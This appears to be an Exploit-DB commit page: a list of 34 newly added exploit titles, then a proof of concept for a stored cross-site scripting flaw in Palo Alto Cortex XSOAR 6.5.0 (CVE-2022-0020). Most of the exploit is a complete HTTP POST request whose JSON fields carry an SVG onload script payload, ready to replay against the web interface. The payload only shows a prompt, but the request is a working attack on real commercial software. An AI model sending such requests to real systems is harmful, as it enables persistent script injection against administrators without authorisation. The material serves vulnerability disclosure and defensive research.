85954a8fad
34 changes to exploits/shellcodes/ghdb ENTAB ERP 1.0 - Username PII leak ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS) FortiRecorder 6.4.3 - Denial of Service Schneider Electric v1.0 - Directory traversal & Broken Authentication Altenergy Power Control Software C1.2.5 - OS command injection Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE) Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated) Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu) Lucee Scheduled Job v1.0 - Command Execution Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE) Adobe Connect 11.4.5 - Local File Disclosure Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS) Suprema BioStar 2 v2.8.16 - SQL Injection Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS) dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated) GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure Icinga Web 2.10 - Arbitrary File Disclosure Joomla! v4.2.8 - Unauthenticated information disclosure Medicine Tracker System v1.0 - Sql Injection Online Appointment System V1.0 - Cross-Site Scripting (XSS) Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE) pfsenseCE v2.6.0 - Anti-brute force protection bypass Restaurant Management System 1.0 - SQL Injection WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS) X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated) X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated) Microsoft Windows 11 - 'cmd.exe' Denial of Service ActFax 10.10 - Unquoted Path Services ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation
44 lines
No EOL
1.6 KiB
Text
44 lines
No EOL
1.6 KiB
Text
# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)
|
|
# Exploit Author: omurugur
|
|
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020
|
|
# Version: 6.5.0 - 6.2.0 - 6.1.0
|
|
# Tested on: [relevant os]
|
|
# CVE : CVE-2022-0020
|
|
# Author Web: https://www.justsecnow.com
|
|
# Author Social: @omurugurrr
|
|
|
|
|
|
A stored cross-site scripting (XSS) vulnerability in Palo Alto Network
|
|
Cortex XSOAR web interface enables an authenticated network-based attacker
|
|
to store a persistent javascript payload that will perform arbitrary
|
|
actions in the Cortex XSOAR web interface on behalf of authenticated
|
|
administrators who encounter the payload during normal operations.
|
|
|
|
POST /acc_UAB(MAY)/incidentfield HTTP/1.1
|
|
Host: x.x.x.x
|
|
Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;
|
|
isTimLicense=false
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)
|
|
Gecko/20100101 Firefox/94.0
|
|
Accept: application/json
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: https://x.x.x.x/acc_UAB(MAY)
|
|
Content-Type: application/json
|
|
X-Xsrf-Token:
|
|
Api_truncate_results: true
|
|
Origin: https://x.x.x.x
|
|
Content-Length: 373
|
|
Sec-Fetch-Dest: empty
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Site: same-origin
|
|
Te: trailers
|
|
Connection: close
|
|
{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field
|
|
edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}
|
|
|
|
Regards,
|
|
|
|
Omur UGUR
|
|
|
|
> |